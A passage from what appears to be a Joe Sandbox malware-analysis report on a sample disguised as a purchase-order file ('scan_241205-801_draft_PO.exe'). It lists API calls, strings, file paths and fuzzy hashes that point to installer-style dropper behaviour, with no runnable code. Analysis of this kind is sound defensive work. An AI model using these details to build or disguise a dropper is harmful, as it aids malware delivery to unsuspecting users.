                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                                • Instruction ID: 075ccd8dd3a5a116662ee2c7ada5c50e1725780f7e4f2104ac300affc7ba1253
                                                                                • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                                • Instruction Fuzzy Hash: 09C04CB1744201AADE108B609D45F0777585790740F158569B350E50E4C674E450D62D
                                                                                APIs
                                                                                • SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                                • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,00404007), ref: 0040423A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                                • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
                                                                                • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                                • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19
                                                                                APIs
                                                                                • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 004059D2
                                                                                • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?), ref: 00405A1A
                                                                                • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?), ref: 00405A3D
                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?), ref: 00405A43
                                                                                • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?), ref: 00405A53
                                                                                • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405AF3
                                                                                • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                                Strings
                                                                                • \*.*, xrefs: 00405A14
                                                                                • (?z, xrefs: 00405A02
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004059B7
                                                                                • "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe", xrefs: 004059A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                • API String ID: 2035342205-1745655618
                                                                                • Opcode ID: 424011659cad5b79ce78afd7bdd610941d28901ad5949753c7324c2a5d5f19f2
                                                                                • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                                • Opcode Fuzzy Hash: 424011659cad5b79ce78afd7bdd610941d28901ad5949753c7324c2a5d5f19f2
                                                                                • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,007A4F70,Designlisters\Muggish.fje,00405CBD,Designlisters\Muggish.fje,Designlisters\Muggish.fje,00000000,Designlisters\Muggish.fje,Designlisters\Muggish.fje,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065E5
                                                                                • FindClose.KERNEL32(00000000), ref: 004065F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID: Designlisters\Muggish.fje$pOz
                                                                                • API String ID: 2295610775-489309236
                                                                                • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                                • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,00000000,00000000), ref: 00405F1E
                                                                                • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                                  • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                  • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D34
                                                                                • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                                • wsprintfA.USER32 ref: 00405F62
                                                                                • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405F9D
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405FAC
                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                                                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00406052
                                                                                  • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                  • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                • String ID: %ls=%ls$[Rename]
                                                                                • API String ID: 2171350718-461813615
                                                                                • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                                • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                                APIs
                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 589700163-1834742834
                                                                                • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                                • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                                • GetSysColor.USER32(00000000), ref: 004042D0
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                                • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                                • GetSysColor.USER32(?), ref: 004042FB
                                                                                • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                                • DeleteObject.GDI32(?), ref: 00404325
                                                                                • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
